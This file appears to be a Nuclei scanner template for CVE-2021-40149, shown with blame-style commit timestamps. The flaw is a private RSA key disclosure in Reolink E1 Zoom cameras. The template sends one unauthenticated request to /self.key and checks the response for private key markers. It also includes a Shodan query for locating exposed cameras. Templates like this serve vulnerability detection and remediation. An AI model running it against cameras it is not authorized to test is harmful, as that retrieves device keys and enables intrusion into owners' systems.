2022-06-07 04:54:50 +00:00
|
|
|
id: CVE-2021-40149
|
|
|
|
|
|
|
|
info:
|
2022-06-30 15:06:10 +00:00
|
|
|
name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure
|
2022-06-07 04:54:50 +00:00
|
|
|
author: For3stCo1d
|
2022-07-28 11:33:27 +00:00
|
|
|
severity: medium
|
2022-06-07 10:02:51 +00:00
|
|
|
description: |
|
2022-06-30 15:06:10 +00:00
|
|
|
Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.
|
2023-09-06 12:09:01 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the vulnerability.
|
2022-06-07 04:54:50 +00:00
|
|
|
reference:
|
|
|
|
- https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt
|
|
|
|
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt
|
2022-06-07 10:02:51 +00:00
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149
|
2023-04-12 10:55:48 +00:00
|
|
|
- http://packetstormsecurity.com/files/167407/Reolink-E1-Zoom-Camera-3.0.0.716-Private-Key-Disclosure.html
|
2022-06-13 14:06:25 +00:00
|
|
|
classification:
|
2022-07-28 11:33:27 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 5.9
|
2022-06-13 14:06:25 +00:00
|
|
|
cve-id: CVE-2021-40149
|
2022-07-28 11:33:27 +00:00
|
|
|
cwe-id: CWE-552
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-score: 0.00689
|
2023-10-14 11:27:55 +00:00
|
|
|
epss-percentile: 0.7783
|
2023-09-06 12:09:01 +00:00
|
|
|
cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:*
|
2022-06-07 04:54:50 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 12:09:01 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: reolink
|
|
|
|
product: e1_zoom_firmware
|
2023-09-06 12:09:01 +00:00
|
|
|
shodan-query: http.title:"Reolink"
|
2023-04-12 10:55:48 +00:00
|
|
|
tags: exposure,unauth,packetstorm,cve,cve2021,reolink,camera,iot
|
2022-06-07 04:54:50 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-06-07 04:54:50 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/self.key"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "-----BEGIN RSA PRIVATE KEY-----"
|
|
|
|
- "-----END RSA PRIVATE KEY----"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|